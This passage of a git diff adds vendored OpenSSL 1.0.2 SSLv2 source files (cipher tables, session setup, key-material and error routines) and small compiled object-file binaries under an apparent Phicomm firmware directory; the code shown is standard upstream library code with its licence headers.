+
+    p = &(sequence[0]);
+    l2n(seq, p);
+
+    /* There has to be a MAC algorithm. */
+    EVP_MD_CTX_init(&c);
+    EVP_MD_CTX_copy(&c, s->read_hash);
+    EVP_DigestUpdate(&c, sec, EVP_CIPHER_CTX_key_length(s->enc_read_ctx));
+    EVP_DigestUpdate(&c, act, len);
+    /* the above line also does the pad data */
+    EVP_DigestUpdate(&c, sequence, 4);
+    EVP_DigestFinal_ex(&c, md, NULL);
+    EVP_MD_CTX_cleanup(&c);
+}
+#else                           /* !OPENSSL_NO_SSL2 */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..211b500f064a10a81b73a68abc4be245568085c6
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`ES5JBqyu_1=c1f!udXPY=y@+@zh!;s>P$>Bz*?_(1U-0L6>|gR1
z=uEPU%WmqS1CzJ&_PyE3ru`V--gF!XR5)-Af0beZzBJOWX&-v91uz+nuH3_ESf!$J
zFZn6=`h$zAE(h;Jk9%iF4c+wWB5Y%>VNUL*&;eKw$1wj3I=&0vKW!S;Ix+Rc?k&NV
zoW|;@Yy*RJn?#1;L{^l;r#Ovx1i;IAB7zW66b-(rm5AR2@aI4Tz{9cx9%V@qr^uz5
zh&f(NzZ5|<ll4nl@w~|LxDa#ez}1L7w9%cKZ{{y)r+xlfv5!yU%<tycyY|EMAE0Ct
zb5;Kdda0*}sfRC%W1YmcI$z<r#_7_TUTACOQ`8t28<^%VESCaTq5^tXJ*c1QrTtGS
pT1X_HN}_fpkN-UD?r7^?4%(AC1?K!axMAKsX&<HVK^Y~Q{$Fq^IF<ka

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_lib.c
new file mode 100644
index 0000000..f8a9439
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_lib.c
@@ -0,0 +1,564 @@
+/* ssl/s2_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "ssl_locl.h"
+#ifndef OPENSSL_NO_SSL2
+# include <stdio.h>
+# include <openssl/objects.h>
+# include <openssl/evp.h>
+# include <openssl/md5.h>
+
+const char ssl2_version_str[] = "SSLv2" OPENSSL_VERSION_PTEXT;
+
+# define SSL2_NUM_CIPHERS (sizeof(ssl2_ciphers)/sizeof(SSL_CIPHER))
+
+/* list of available SSLv2 ciphers (sorted by id) */
+OPENSSL_GLOBAL const SSL_CIPHER ssl2_ciphers[] = {
+# if 0
+/* NULL_WITH_MD5 v3 */
+    {
+     1,
+     SSL2_TXT_NULL_WITH_MD5,
+     SSL2_CK_NULL_WITH_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_eNULL,
+     SSL_MD5,
+     SSL_SSLV2,
+     SSL_EXPORT | SSL_EXP40 | SSL_STRONG_NONE,
+     0,
+     0,
+     0,
+     },
+# endif
+
+/* RC4_128_WITH_MD5 */
+    {
+     1,
+     SSL2_TXT_RC4_128_WITH_MD5,
+     SSL2_CK_RC4_128_WITH_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_RC4,
+     SSL_MD5,
+     SSL_SSLV2,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     0,
+     128,
+     128,
+     },
+
+/* RC4_128_EXPORT40_WITH_MD5 */
+    {
+     1,
+     SSL2_TXT_RC4_128_EXPORT40_WITH_MD5,
+     SSL2_CK_RC4_128_EXPORT40_WITH_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_RC4,
+     SSL_MD5,
+     SSL_SSLV2,
+     SSL_EXPORT | SSL_EXP40,
+     SSL2_CF_5_BYTE_ENC,
+     40,
+     128,
+     },
+
+/* RC2_128_CBC_WITH_MD5 */
+    {
+     1,
+     SSL2_TXT_RC2_128_CBC_WITH_MD5,
+     SSL2_CK_RC2_128_CBC_WITH_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_RC2,
+     SSL_MD5,
+     SSL_SSLV2,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     0,
+     128,
+     128,
+     },
+
+/* RC2_128_CBC_EXPORT40_WITH_MD5 */
+    {
+     1,
+     SSL2_TXT_RC2_128_CBC_EXPORT40_WITH_MD5,
+     SSL2_CK_RC2_128_CBC_EXPORT40_WITH_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_RC2,
+     SSL_MD5,
+     SSL_SSLV2,
+     SSL_EXPORT | SSL_EXP40,
+     SSL2_CF_5_BYTE_ENC,
+     40,
+     128,
+     },
+
+# ifndef OPENSSL_NO_IDEA
+/* IDEA_128_CBC_WITH_MD5 */
+    {
+     1,
+     SSL2_TXT_IDEA_128_CBC_WITH_MD5,
+     SSL2_CK_IDEA_128_CBC_WITH_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_IDEA,
+     SSL_MD5,
+     SSL_SSLV2,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     0,
+     128,
+     128,
+     },
+# endif
+
+/* DES_64_CBC_WITH_MD5 */
+    {
+     1,
+     SSL2_TXT_DES_64_CBC_WITH_MD5,
+     SSL2_CK_DES_64_CBC_WITH_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_DES,
+     SSL_MD5,
+     SSL_SSLV2,
+     SSL_NOT_EXP | SSL_LOW,
+     0,
+     56,
+     56,
+     },
+
+/* DES_192_EDE3_CBC_WITH_MD5 */
+    {
+     1,
+     SSL2_TXT_DES_192_EDE3_CBC_WITH_MD5,
+     SSL2_CK_DES_192_EDE3_CBC_WITH_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_3DES,
+     SSL_MD5,
+     SSL_SSLV2,
+     SSL_NOT_EXP | SSL_HIGH,
+     0,
+     112,
+     168,
+     },
+
+# if 0
+/* RC4_64_WITH_MD5 */
+    {
+     1,
+     SSL2_TXT_RC4_64_WITH_MD5,
+     SSL2_CK_RC4_64_WITH_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_RC4,
+     SSL_MD5,
+     SSL_SSLV2,
+     SSL_NOT_EXP | SSL_LOW,
+     SSL2_CF_8_BYTE_ENC,
+     64,
+     64,
+     },
+# endif
+
+# if 0
+/* NULL SSLeay (testing) */
+    {
+     0,
+     SSL2_TXT_NULL,
+     SSL2_CK_NULL,
+     0,
+     0,
+     0,
+     0,
+     SSL_SSLV2,
+     SSL_STRONG_NONE,
+     0,
+     0,
+     0,
+     },
+# endif
+
+/* end of list :-) */
+};
+
+long ssl2_default_timeout(void)
+{
+    return (300);
+}
+
+int ssl2_num_ciphers(void)
+{
+    return (SSL2_NUM_CIPHERS);
+}
+
+const SSL_CIPHER *ssl2_get_cipher(unsigned int u)
+{
+    if (u < SSL2_NUM_CIPHERS)
+        return (&(ssl2_ciphers[SSL2_NUM_CIPHERS - 1 - u]));
+    else
+        return (NULL);
+}
+
+int ssl2_pending(const SSL *s)
+{
+    return SSL_in_init(s) ? 0 : s->s2->ract_data_length;
+}
+
+int ssl2_new(SSL *s)
+{
+    SSL2_STATE *s2;
+
+    if ((s2 = OPENSSL_malloc(sizeof *s2)) == NULL)
+        goto err;
+    memset(s2, 0, sizeof *s2);
+
+# if SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER + 3 > SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER + 2
+#  error "assertion failed"
+# endif
+
+    if ((s2->rbuf =
+         OPENSSL_malloc(SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER + 2)) == NULL)
+        goto err;
+    /*
+     * wbuf needs one byte more because when using two-byte headers, we leave
+     * the first byte unused in do_ssl_write (s2_pkt.c)
+     */
+    if ((s2->wbuf =
+         OPENSSL_malloc(SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER + 3)) == NULL)
+        goto err;
+    s->s2 = s2;
+
+    ssl2_clear(s);
+    return (1);
+ err:
+    if (s2 != NULL) {
+        if (s2->wbuf != NULL)
+            OPENSSL_free(s2->wbuf);
+        if (s2->rbuf != NULL)
+            OPENSSL_free(s2->rbuf);
+        OPENSSL_free(s2);
+    }
+    return (0);
+}
+
+void ssl2_free(SSL *s)
+{
+    SSL2_STATE *s2;
+
+    if (s == NULL)
+        return;
+
+    s2 = s->s2;
+    if (s2->rbuf != NULL)
+        OPENSSL_free(s2->rbuf);
+    if (s2->wbuf != NULL)
+        OPENSSL_free(s2->wbuf);
+    OPENSSL_cleanse(s2, sizeof *s2);
+    OPENSSL_free(s2);
+    s->s2 = NULL;
+}
+
+void ssl2_clear(SSL *s)
+{
+    SSL2_STATE *s2;
+    unsigned char *rbuf, *wbuf;
+
+    s2 = s->s2;
+
+    rbuf = s2->rbuf;
+    wbuf = s2->wbuf;
+
+    memset(s2, 0, sizeof *s2);
+
+    s2->rbuf = rbuf;
+    s2->wbuf = wbuf;
+    s2->clear_text = 1;
+    s->packet = s2->rbuf;
+    s->version = SSL2_VERSION;
+    s->packet_length = 0;
+}
+
+long ssl2_ctrl(SSL *s, int cmd, long larg, void *parg)
+{
+    int ret = 0;
+
+    switch (cmd) {
+    case SSL_CTRL_GET_SESSION_REUSED:
+        ret = s->hit;
+        break;
+    case SSL_CTRL_CHECK_PROTO_VERSION:
+        return ssl3_ctrl(s, SSL_CTRL_CHECK_PROTO_VERSION, larg, parg);
+    default:
+        break;
+    }
+    return (ret);
+}
+
+long ssl2_callback_ctrl(SSL *s, int cmd, void (*fp) (void))
+{
+    return (0);
+}
+
+long ssl2_ctx_ctrl(SSL_CTX *ctx, int cmd, long larg, void *parg)
+{
+    return (0);
+}
+
+long ssl2_ctx_callback_ctrl(SSL_CTX *ctx, int cmd, void (*fp) (void))
+{
+    return (0);
+}
+
+/*
+ * This function needs to check if the ciphers required are actually
+ * available
+ */
+const SSL_CIPHER *ssl2_get_cipher_by_char(const unsigned char *p)
+{
+    SSL_CIPHER c;
+    const SSL_CIPHER *cp;
+    unsigned long id;
+
+    id = 0x02000000L | ((unsigned long)p[0] << 16L) |
+        ((unsigned long)p[1] << 8L) | (unsigned long)p[2];
+    c.id = id;
+    cp = OBJ_bsearch_ssl_cipher_id(&c, ssl2_ciphers, SSL2_NUM_CIPHERS);
+    return cp;
+}
+
+int ssl2_put_cipher_by_char(const SSL_CIPHER *c, unsigned char *p)
+{
+    long l;
+
+    if (p != NULL) {
+        l = c->id;
+        if ((l & 0xff000000) != 0x02000000 && l != SSL3_CK_FALLBACK_SCSV)
+            return (0);
+        p[0] = ((unsigned char)(l >> 16L)) & 0xFF;
+        p[1] = ((unsigned char)(l >> 8L)) & 0xFF;
+        p[2] = ((unsigned char)(l)) & 0xFF;
+    }
+    return (3);
+}
+
+int ssl2_generate_key_material(SSL *s)
+{
+    unsigned int i;
+    EVP_MD_CTX ctx;
+    unsigned char *km;
+    unsigned char c = '0';
+    const EVP_MD *md5;
+    int md_size;
+
+    md5 = EVP_md5();
+
+# ifdef CHARSET_EBCDIC
+    c = os_toascii['0'];        /* Must be an ASCII '0', not EBCDIC '0', see
+                                 * SSLv2 docu */
+# endif
+    EVP_MD_CTX_init(&ctx);
+    km = s->s2->key_material;
+
+    if (s->session->master_key_length < 0 ||
+        s->session->master_key_length > (int)sizeof(s->session->master_key)) {
+        SSLerr(SSL_F_SSL2_GENERATE_KEY_MATERIAL, ERR_R_INTERNAL_ERROR);
+        return 0;
+    }
+    md_size = EVP_MD_size(md5);
+    if (md_size < 0)
+        return 0;
+    for (i = 0; i < s->s2->key_material_length; i += md_size) {
+        if (((km - s->s2->key_material) + md_size) >
+            (int)sizeof(s->s2->key_material)) {
+            /*
+             * EVP_DigestFinal_ex() below would write beyond buffer
+             */
+            SSLerr(SSL_F_SSL2_GENERATE_KEY_MATERIAL, ERR_R_INTERNAL_ERROR);
+            return 0;
+        }
+
+        EVP_DigestInit_ex(&ctx, md5, NULL);
+
+        OPENSSL_assert(s->session->master_key_length >= 0
+                       && s->session->master_key_length
+                       < (int)sizeof(s->session->master_key));
+        EVP_DigestUpdate(&ctx, s->session->master_key,
+                         s->session->master_key_length);
+        EVP_DigestUpdate(&ctx, &c, 1);
+        c++;
+        EVP_DigestUpdate(&ctx, s->s2->challenge, s->s2->challenge_length);
+        EVP_DigestUpdate(&ctx, s->s2->conn_id, s->s2->conn_id_length);
+        EVP_DigestFinal_ex(&ctx, km, NULL);
+        km += md_size;
+    }
+
+    EVP_MD_CTX_cleanup(&ctx);
+    return 1;
+}
+
+void ssl2_return_error(SSL *s, int err)
+{
+    if (!s->error) {
+        s->error = 3;
+        s->error_code = err;
+
+        ssl2_write_error(s);
+    }
+}
+
+void ssl2_write_error(SSL *s)
+{
+    unsigned char buf[3];
+    int i, error;
+
+    buf[0] = SSL2_MT_ERROR;
+    buf[1] = (s->error_code >> 8) & 0xff;
+    buf[2] = (s->error_code) & 0xff;
+
+/*      state=s->rwstate;*/
+
+    error = s->error;           /* number of bytes left to write */
+    s->error = 0;
+    OPENSSL_assert(error >= 0 && error <= (int)sizeof(buf));
+    i = ssl2_write(s, &(buf[3 - error]), error);
+
+/*      if (i == error) s->rwstate=state; */
+
+    if (i < 0)
+        s->error = error;
+    else {
+        s->error = error - i;
+
+        if (s->error == 0)
+            if (s->msg_callback) {
+                /* ERROR */
+                s->msg_callback(1, s->version, 0, buf, 3, s,
+                                s->msg_callback_arg);
+            }
+    }
+}
+
+int ssl2_shutdown(SSL *s)
+{
+    s->shutdown = (SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
+    return (1);
+}
+#else                           /* !OPENSSL_NO_SSL2 */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..5f2d4d0a9ff5195d6cab82839e5febce393c3432
GIT binary patch
literal 1080
zcmbVLO-sW-5S@1GS5JBqyu_1=c1f!udXPY=y@+@zh!;s>P^tMK*?_(1U-0L6>|gR1
z=uEPU%WmqS1CzJ&_PyE3ru`UQU$t8;P|<=*_^T8P@THMnMSIYN4S?}*c;W0%f-(`M
zbIy;s+v}f|RoQ<ZxZFKCsOh>_2VoO)1#^5efi}RLIEMLO(D5Dk{%O*%#)+vXc5eu_
z;51fEWg8f*+9WazC$gd#JiNXHJOtpyEEax%DDoPg)k;Kf0{EjZeBeP*01wkRjuPaO
zR74yvrdJ3*oXYwsDS4KsS(J;Jb>MQu4%+BW%{TKFw9`I+rP#$MaprgPs$KhG`u9+>
zj=8M=2))$P#ni)-#i35(TAi=(RO58%R4=r(@+oSBi#1I17nVtZBT)gps~*(P^wR#P
q6wM`)PbE>?lE;6Zb$7IND+ldLodR?IE!;5gp0xK;c&CgKP5&=*6*!jw

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_meth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_meth.c
new file mode 100644
index 0000000..b312f17
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_meth.c
@@ -0,0 +1,81 @@
+/* ssl/s2_meth.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "ssl_locl.h"
+#ifndef OPENSSL_NO_SSL2
+# include <stdio.h>
+# include <openssl/objects.h>
+
+static const SSL_METHOD *ssl2_get_method(int ver);
+static const SSL_METHOD *ssl2_get_method(int ver)
+{
+    if (ver == SSL2_VERSION)
+        return (SSLv2_method());
+    else
+        return (NULL);
+}
+
+IMPLEMENT_ssl2_meth_func(SSLv2_method,
+                         ssl2_accept, ssl2_connect, ssl2_get_method)
+#else                           /* !OPENSSL_NO_SSL2 */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_meth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_meth.o
new file mode 100644
index 0000000000000000000000000000000000000000..73888d38a2b8804feaaf39fd738e769b262f296c
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`E_eF1lmv~aqE@@Rn4-zP~7ZEQ7!Gk0*SSb0R*+6^Izu?dD*uUg2
z(3xZxm)+Du2PSXl?R&G6P5UvpziT-TsBqvG{wl=+d}*X#(LQX$7QnFIzj2R8VVR23
zz2@iK>vXTms_ee^Jnmhb)O6jejj)TkhB<r~K?`6(9K-xC==e5#|1@b><HXbxyEg<|
zavH0qvJDK@Z4w!V6IoI8UXoahc?7_Vc_M-kQA}$btCfgn0{Ckn0^ng$0FSaHiBsg#
zOvD^-rc;O@n#lSsEqOl8@^~ud)`=?-2k4?ZHQ&r%(oOsPmEsVe#F^jCuXgQ+=|4ir
zCg!UCGxSnV4^t0c7N<IiYjwWDOO4Z|6TQ&Z%BQFSE;caDUsx^$u0#d&u6j^E(@XoG
rQnZjrK9xl6OCJAu*4@$8qa1Wc>J*ss@8O1d_oRK6!Y5^vX!?HvtO_|0

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_pkt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_pkt.c
new file mode 100644
index 0000000..614b9a3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_pkt.c
@@ -0,0 +1,711 @@
+/* ssl/s2_pkt.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
